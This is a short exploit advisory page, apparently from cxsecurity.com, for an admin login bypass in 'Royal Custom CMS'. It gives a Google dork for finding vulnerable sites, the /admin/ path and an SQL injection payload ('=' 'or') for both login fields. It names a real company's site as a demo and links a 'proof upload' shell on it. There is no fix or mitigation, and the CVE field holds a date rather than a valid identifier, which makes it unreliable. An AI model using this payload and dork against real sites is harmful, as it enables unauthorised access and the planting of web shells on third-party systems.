Royal Custom CMS Admin Login Bypass upload sh3ll

2017.07.03
Credit: iranonymous
Risk: Medium
Local: No
Remote: Yes
CVE: 2017-07-02
CWE: CWE-89

====================================================== # Exploit Title: Royal Custom CMS Admin Login Bypass upload sh3ll # Google Dork: " © 2011 Royal Custom Homes. All Rights Reserved. CCB: 158983" # Date: 2017-07-01 # Author: iranonymous # Tested on: Win 7, Linux *************************************************** # Then Choose a Target and put this after URL :--> /admin/ # And fill username and password like the information below : # Username: '=' 'or' # Password: '=' 'or' ====================================================== # Demo : http://www.royalcustomhomes.com/admin/ # Proof upload: http://www.royalcustomhomes.com/up.php ===================================================== # Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || ll_azab-siyah_ll || Dedicated Content ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr || # Iranian Anonymous # Discovered By: Saman.Khan

References:

iranonymous


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top